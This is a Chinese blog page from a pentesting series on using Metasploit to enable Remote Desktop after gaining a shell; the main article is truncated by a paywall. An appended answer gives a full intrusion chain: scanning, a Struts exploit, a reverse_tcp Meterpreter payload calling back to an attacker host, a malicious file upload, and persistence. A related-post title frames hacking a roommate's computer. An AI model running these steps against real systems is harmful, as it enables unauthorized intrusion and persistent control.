【神兵利器】——187、MSF远程桌面

已于 2024-10-16 17:26:35 修改
阅读量342 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 【WEB渗透】 文章标签: 漏洞复现 渗透测试 信息安全 网络安全 MSF
于 2024-10-16 17:26:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/142987256
文章前言

在渗透测试中如果我们获取到了目标服务器的权限,此时我们可以考虑查看当前服务器是否有开启远程桌面,如果有开启远程桌面则可以通过图形化界面的方式进行远程操作,更加便捷,更加迅速,如果没有开启远程桌面,那么我们可以通过获取到的shell来执行命令开启远程桌面,随后进行利用

开启服务

Step 1:服务状态检测

msf6 exploit(multi/handler) > search rdp_
msf6 exploit(multi/handler) > use 0
msf6 auxiliary(scanner/rdp/rdp_scanner) > set RHOSTS 192.168.204.151
msf6 auxiliary(scanner/rdp/rdp_scanner) > exploit

关闭状态扫描结果如下所示:

开启状态扫描结果如下所示:

Step 2:开启远程桌面

msf6 au
了解本专栏 订阅专栏 解锁全文
神兵利器】——191、MSF终端乱码
Fly_鹏程万里
10-17 489
我们在使用MSF对目标系统实施攻击后获取到一个Meterpreter之后转shell时经常会遇到中文乱码的情况,导致我们在cmd中执行命令后回显的结果没法友好的展示,而造成这类问题的根本原因在于编码不一致导致的,本篇文章主要介绍如何解决此类问题。
神兵利器】——190、MSF持续监听
Fly_鹏程万里
10-16 235
基本介绍。
msf拿下windows的远程桌面
mulincong的博客
05-25 1169
msf拿下windows的远程桌面
今天简单黑一下室友电脑:MSF提权开启远程桌面并连接
kjuhfkicf154的博客
01-04 4106
今天简单黑一下室友电脑~
记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面
随心所欲不逾矩
02-27 1018
前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境部署一个Windows7系统,在这个系统上把finecms这个应用部署上去。把finecms安装之后,和客户沟通,把这个应用的地址映射到公网上去。2,其次,没有条件的话,自己在在wmware上装个虚拟机部署上去也行。
[ MSF使用实例 ] 利用远程桌面代码执行漏洞(MS12-020)漏洞导致windows靶机蓝屏
qq_51577576的博客
08-27 1712
Metasploit是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。后续会有专门的文章介绍MSF,这里只是一个实例,就不多讲了。...
使用MSFPC远程控制
y3174445239的博客
06-24 876
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
神兵利器】——192、MSF终端乱码
Fly_鹏程万里
10-17 245
Metasploit Framework(MSF)提供了多种权限维持(Persistence)模块和技术,用于在已经获得对目标系统访问权限的情况下保持持久性以确保持续访问,本篇文章主要介绍一些MSF框架中的权限维持的方法并结合一些具体的操作来介绍权限维持的操作手法。
神兵利器】——188、MSF获取凭据
Fly_鹏程万里
10-16 209
Metasploit Framework(简称MSF)是一个功能强大的开源渗透测试框架,广泛应用于网络安全领域,作为一款功能丰富且灵活的工具,MSF提供了多种模块和技术,用于发现漏洞、执行远程代码、获取凭据等操作以评估系统和网络的安全性。
MSF远程登录实验
坏坏-5的博客
04-13 3885
本篇是关于使用MSF工具远程控制桌面实验笔记!
内网MSF--从入门到熟练
qq_53003652的博客
12-25 2186
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
开启目标远程桌面服务方法总结
Kevin's Blog
11-12 6861
文章目录一、目的二、CMD之远程桌面服务2.1 查看远程桌面是否开启2.2 确认远程端口号是否默认2.3 确认远程桌面服务状态2.4 WMIC开启/关闭远程桌面(推荐)2.5 更改远程桌面端口(附)三、MSF开启目标远程桌面3.1 在MSF shell中开启远程桌面(推荐)3.1.1 优 / 缺点3.1.2 启动远程桌面前 前期工作3.1.3 MSF shell中使用WMIC启动3.2 使用MSF enable_rdp模块3.2.1 优 / 缺点3.2.2 Meterpretr enable_rdp模块中启
浅谈针对rdp协议的四种测试方法
Fly_鹏程万里
10-30 4997
渗透测试通常情况下是以功能为导向的。一组协议通常能支持、实现一种功能。本文浅谈一下针对 RDP 协议的几种测试方法,也就是针对远程桌面这种功能的利用。本人水平有限,但仍希望对大家能有帮助。 基本介绍 这里讨论的是 windows 下的 rdp(Remote Display Protocol )协议,也就是 windows 的远程桌面。通过提供一个有效的用户账号密码即可登陆到服务端,进行图形界面...
Kali 玩机技巧(杂篇)
辉小鱼的博客
11-03 2372
本文是有关Kali Linux系统的一些简单低级的用法演示,是我个人听课笔记的总结,希望能解决大家的一些问题与困惑!该博文仅限技术学习与交流,若由此发生的一切攻击不法行为,皆与本人无关!
windows: 检查和启动远程桌面服务
十年运维开发经验的王义杰在此分享自己的知识和经验
11-14 1万+
要检查并启动 Windows 服务器上的远程桌面服务(Remote Desktop Services),我们可以使用 PowerShell 或通过 Windows 服务管理界面。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 4万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
Metasploit利用远程桌面协议RDP拒绝访问漏洞(MS12-020)
浮生若梦的专栏
06-22 1万+
漏洞版本: Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datac
msfconsole 控制台使用和操作
xianjie0318的博客
08-07 3万+
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于...
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
weixin_62490257的博客
06-29 4295
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
当我知道对方IP地址msf远程控制
最新发布
06-25
### 使用 Metasploit 进行远程控制的基本步骤 Metasploit 是一个功能强大的渗透测试框架,可以用于漏洞扫描、利用和后渗透攻击。若已知目标的 IP 地址(例如 192.168.56.101 或 192.168.18.18),可以通过以下流程实现远程控制。 #### 启动 Metasploit 框架 首先,在终端中启动 Metasploit 框架: ```bash msfconsole ``` #### 扫描目标网络 使用 `nmap` 或 Metasploit 自带的扫描模块来识别目标主机上开放的端口和服务。例如,使用 `auxiliary/scanner/portscan/tcp` 模块进行 TCP 端口扫描: ```bash use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.18.18 run ``` 该命令将扫描目标地址上的开放端口,帮助识别潜在的攻击面 [^2]。 #### 选择合适的漏洞利用模块 根据扫描结果,找到目标系统可能存在的漏洞并选择相应的 exploit 模块。例如,如果目标运行了 Apache Struts 并存在 CVE-2017-5638 漏洞,则可以使用如下命令: ```bash use exploit/multi/http/struts2_content_type_ognl set RHOST 192.168.18.18 set TARGETURI /index.action ``` #### 设置 payload payload 是在目标系统上执行的有效载荷,通常为反向连接 shell 或 Meterpreter 会话。例如,设置反向 TCP 连接的 payload: ```bash set payload windows/meterpreter/reverse_tcp set LHOST 192.168.56.101 set LPORT 443 ``` 上述配置表示目标将在成功利用后尝试连接到攻击者机器的指定 IP 和端口 [^1]。 #### 执行攻击 确认所有参数正确无误后,运行 exploit 命令发起攻击: ```bash exploit ``` 如果漏洞利用成功,将获得一个与目标系统的交互式会话。 #### 获取远程控制 一旦 payload 成功执行,可以使用 Meterpreter 进行多种后渗透操作,例如上传文件、捕获键盘输入或持久化访问。常用命令包括: - **获取系统信息**: ```bash sysinfo ``` - **列出当前目录下的文件**: ```bash ls ``` - **上传恶意文件**: ```bash upload malicious_file.exe ``` - **执行远程命令**: ```bash execute -f cmd.exe -c ``` #### 持久化访问 为了确保即使目标重启后仍可访问,可以使用持久化模块。例如,创建注册表项以自动启动 payload: ```bash run persistence -A -L /tmp -p 443 -r 192.168.56.101 ``` 此命令将在目标系统中添加开机自启项,以便下次连接时保持访问权限 [^1]。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值